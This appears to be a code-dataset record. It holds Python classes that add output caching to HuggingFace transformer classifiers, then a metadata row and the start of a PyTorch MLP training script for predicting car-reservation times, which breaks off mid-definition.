def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = outputs
self.cache[cache_key] = tuple(o.detach().cpu() for o in outputs)
else:
# print('USING CACHED OUTPUTS')
# outputs = self.cache[cache_key]
outputs = tuple(o.cuda() for o in self.cache[cache_key])
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[
2:
] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss,
labels.view(-1),
torch.tensor(loss_fct.ignore_index).type_as(labels),
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
class DistilBertForTokenClassificationCached(DistilBertForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
outputs = self.distilbert(
input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = outputs
self.cache[cache_key] = tuple(o.detach().cpu() for o in outputs)
else:
# print('USING CACHED OUTPUTS')
# outputs = self.cache[cache_key]
outputs = tuple(o.cuda() for o in self.cache[cache_key])
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[
1:
] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss,
labels.view(-1),
torch.tensor(loss_fct.ignore_index).type_as(labels),
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
class ElectraForTokenClassificationCached(ElectraForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 1000):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
discriminator_hidden_states = self.electra(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
inputs_embeds,
output_attentions,
output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = discriminator_hidden_states
self.cache[cache_key] = tuple(
discriminator_hidden_states[o].detach().cpu()
for o in discriminator_hidden_states
)
else:
# print('USING CACHED OUTPUTS')
discriminator_hidden_states = tuple(o.cuda() for o in self.cache[cache_key])
discriminator_sequence_output = discriminator_hidden_states[0]
discriminator_sequence_output = self.dropout(discriminator_sequence_output)
logits = self.classifier(discriminator_sequence_output)
output = (logits,)
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.config.num_labels)[active_loss]
active_labels = labels.view(-1)[active_loss]
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(
logits.view(-1, self.config.num_labels), labels.view(-1)
)
output = (loss,) + output
output += discriminator_hidden_states[1:]
return output # (loss), scores, (hidden_states), (attentions)
class CachedInferenceMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def inference_body(
self,
body,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
inputs_embeds,
output_attentions,
output_hidden_states,
return_dict,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
if head_mask is not None:
hidden_states = body(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
else:
hidden_states = body(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# added part for tuples - this needed for metric regularizer, because
# with it we set output_hidden to True
self.cache[cache_key] = {
n: o.detach().cpu()
if (o is not None and not isinstance(o, tuple))
else o
for n, o in hidden_states.__dict__.items()
}
else:
hidden_states = BaseModelOutputWithPoolingAndCrossAttentions(
**{
n: o.cuda() if (o is not None and not isinstance(o, tuple)) else o
for n, o in self.cache[cache_key].items()
}
)
return hidden_states
class ElectraForSequenceClassificationCached(
CachedInferenceMixin, ElectraForSequenceClassification
):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
discriminator_hidden_states = self.inference_body(
self.electra,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = discriminator_hidden_states[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=discriminator_hidden_states.hidden_states,
attentions=discriminator_hidden_states.attentions,
)
class BertForSequenceClassificationCached(
CachedInferenceMixin, BertForSequenceClassification
):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
outputs = self.inference_body(
body=self.bert,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
class RobertaForSequenceClassificationCached(
CachedInferenceMixin, RobertaForSequenceClassification
):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
discriminator_hidden_states = self.inference_body(
self.roberta,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = discriminator_hidden_states[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=discriminator_hidden_states.hidden_states,
attentions=discriminator_hidden_states.attentions,
)
class DebertaForSequenceClassificationCached(
CachedInferenceMixin, DebertaForSequenceClassification
):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
discriminator_hidden_states = self.inference_body(
self.deberta,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=None,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
encoder_layer = discriminator_hidden_states[0]
pooled_output = self.pooler(encoder_layer)
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=discriminator_hidden_states.hidden_states,
attentions=discriminator_hidden_states.attentions,
)
class DebertaForTokenClassificationCached(CachedInferenceMixin, DebertaForTokenClassification):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
discriminator_hidden_states = self.inference_body(
self.deberta,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=None,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = discriminator_hidden_states[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
output = (logits,)
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.config.num_labels)[active_loss]
active_labels = labels.view(-1)[active_loss]
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(
logits.view(-1, self.config.num_labels), labels.view(-1)
)
output = (loss,) + output
output += discriminator_hidden_states[1:]
return output # (loss), scores, (hidden_states), (attentions)
class DistilBertCachedInferenceMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def inference_body(
self,
body,
input_ids,
attention_mask,
head_mask,
inputs_embeds,
output_attentions,
output_hidden_states,
return_dict,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
hidden_states = body(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# added part for tuples - this needed for metric regularizer, because
# with it we set output_hidden to True
self.cache[cache_key] = {
n: o.detach().cpu()
if (o is not None and not isinstance(o, tuple))
else o
for n, o in hidden_states.__dict__.items()
}
else:
hidden_states = BaseModelOutputWithPoolingAndCrossAttentions(
**{
n: o.cuda() if (o is not None and not isinstance(o, tuple)) else o
for n, o in self.cache[cache_key].items()
}
)
return hidden_states
class DistilBertForTokenClassificationCached(DistilBertForTokenClassification):
def __init__(self, config):
super().__init__(config)
self.use_cache = False
self.cache_size = None
self.cache = dict()
def empty_cache(self):
self.cache.clear()
def enable_cache(self):
self.use_cache = True
def disable_cache(self):
self.use_cache = False
self.empty_cache()
def set_cache_size(self, size: Optional[int] = 25):
self.cache_size = size
@staticmethod
def create_cache_key(tensor: torch.Tensor) -> int:
return hash(frozenset(tensor.cpu().numpy().ravel()))
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
):
cache_key = self.create_cache_key(input_ids)
if not self.use_cache or cache_key not in self.cache:
outputs = self.distilbert(
input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
if self.use_cache and (
self.cache_size is None or len(self.cache) < self.cache_size
):
# print('WRITING TO CACHE')
# self.cache[cache_key] = outputs
self.cache[cache_key] = tuple(outputs[o].detach().cpu() for o in outputs)
else:
# print('USING CACHED OUTPUTS')
# outputs = self.cache[cache_key]
outputs = tuple(o.cuda() for o in self.cache[cache_key])
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
outputs = (logits,) + outputs[
1:
] # add hidden states and attention if they are here
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss,
labels.view(-1),
torch.tensor(loss_fct.ignore_index).type_as(labels),
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs # (loss), scores, (hidden_states), (attentions)
class DistilBertForSequenceClassificationCached(
DistilBertCachedInferenceMixin, DistilBertForSequenceClassification
):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
distilbert_output = self.inference_body(
self.distilbert,
input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_state = distilbert_output[0] # (bs, seq_len, dim)
pooled_output = hidden_state[:, 0] # (bs, dim)
pooled_output = self.pre_classifier(pooled_output) # (bs, dim)
pooled_output = nn.ReLU()(pooled_output) # (bs, dim)
pooled_output = self.dropout(pooled_output) # (bs, dim)
logits = self.classifier(pooled_output) # (bs, num_labels)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + distilbert_output[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=distilbert_output.hidden_states,
attentions=distilbert_output.attentions,
)
class ElectraForSequenceClassificationAllLayers(ElectraForSequenceClassification):
def __init__(self, config):
super().__init__(config)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=True,
return_dict=None,
):
return_dict = (
return_dict if return_dict is not None else self.config.use_return_dict
)
discriminator_hidden_states = self.electra(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
features = discriminator_hidden_states[0]
logits = self.classifier(features)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
hidden_states = [hs.detach().cpu()[:, 0, :] for hs in discriminator_hidden_states.hidden_states]
discriminator_hidden_states.hidden_states = hidden_states
if not return_dict:
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=discriminator_hidden_states.hidden_states,
attentions=discriminator_hidden_states.attentions,
) | 33.098969 | 104 | 0.587149 | 3,400 | 32,106 | 5.257059 | 0.050882 | 0.070493 | 0.041289 | 0.018071 | 0.88363 | 0.864496 | 0.854202 | 0.838704 | 0.838704 | 0.834228 | 0 | 0.004584 | 0.334081 | 32,106 | 970 | 105 | 33.098969 | 0.831431 | 0.04454 | 0 | 0.840252 | 0 | 0 | 0.004113 | 0.00346 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07044 | false | 0 | 0.007547 | 0.007547 | 0.125786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
53b4c335236d6ea7ec00d42a031fb99fb04b64cb | 72,946 | py | Python | model_scripts/MLP.py | Bogeluno/GNN_Thesis | b1a3e60d9b9a189b1c97ea7479d6606e45d32538 | [
"MIT"
] | null | null | null | model_scripts/MLP.py | Bogeluno/GNN_Thesis | b1a3e60d9b9a189b1c97ea7479d6606e45d32538 | [
"MIT"
] | null | null | null | model_scripts/MLP.py | Bogeluno/GNN_Thesis | b1a3e60d9b9a189b1c97ea7479d6606e45d32538 | [
"MIT"
] | null | null | null | import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
import pickle
import time
from sklearn.metrics import r2_score, classification_report
pd.set_option('mode.chained_assignment',None)
class EarlyStopping:
"""Early stops the training if validation loss doesn't improve after a given patience."""
def __init__(self, patience=20, verbose=False, path='checkpoint.pt', trace_func=print):
"""
Args:
patience (int): How long to wait after last time validation loss improved.
Default: 20
verbose (bool): If True, prints a message for each validation loss improvement.
Default: False
path (str): Path for the checkpoint to be saved to.
Default: 'checkpoint.pt'
trace_func (function): trace print function.
Default: print
"""
self.patience = patience
self.verbose = verbose
self.counter = 0
self.best_score = None
self.early_stop = False
self.val_loss_min = np.Inf
self.path = path
def __call__(self, val_loss, model):
score = -val_loss
if self.best_score is None:
self.best_score = score
self.save_checkpoint(val_loss, model)
elif score < self.best_score:
self.counter += 1
if self.counter >= self.patience:
self.early_stop = True
else:
self.best_score = score
self.save_checkpoint(val_loss, model)
self.counter = 0
def save_checkpoint(self, val_loss, model):
'''Saves model when validation loss decrease.'''
if self.verbose:
self.trace_func(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). Saving model ...')
torch.save(model.state_dict(), self.path)
self.val_loss_min = val_loss
def r2_loss(output, target):
target_mean = torch.mean(target)
ss_tot = torch.sum((target - target_mean) ** 2)
ss_res = torch.sum((target - output) ** 2)
r2 = 1 - ss_res / ss_tot
return -r2
# Load full Data
df_full = pd.read_csv('Data/SimpleNNData.csv', index_col=0, parse_dates = [1]).sort_values(by = 'time')
y = df_full.time_to_reservation
df_full.drop(columns=['time_to_reservation', 'hour_index'], inplace=True)
# Load weather
Weather_Scale = pd.read_csv('Data/MinMaxWeather.csv', index_col=0)
weather_var = list(Weather_Scale.index)
# Load slicing
with open("Data/Sample_CC", "rb") as fp:
cc = pickle.load(fp)
# For classification
Clas_Coef = dict(pd.concat([df_full.time.dt.hour.iloc[np.concatenate(cc[:2])],y.iloc[np.concatenate(cc[:2])]], axis = 1).groupby('time')['time_to_reservation'].mean()*2)
df_clas = pd.concat([df_full.time.dt.hour.iloc[cc[2]],y.iloc[cc[2]]], axis = 1)
df_clas['Cut'] = df_clas.time.map(dict(Clas_Coef))
# Common setting
batch_size = 512
num_epochs = 1500
# Set up print
time_start = time.time()
sys.stdout = open("Results/MLP_3Sizes_Results.txt", "w")
##################################
### NO ZONES
##################################
print('----------------------------------------------')
print('---NO ZONES')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = list(df_full.filter(regex = 'lz').columns) + weather_var + ['dist_to_station','time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(9,32),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(32,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay = 0.0001) #Chaged to Adam and learning + regulariztion rate set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(9,32),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.002, weight_decay = 0.0001) #Chaged to Adam and learning + regulariztion rate set
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/NoZones.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
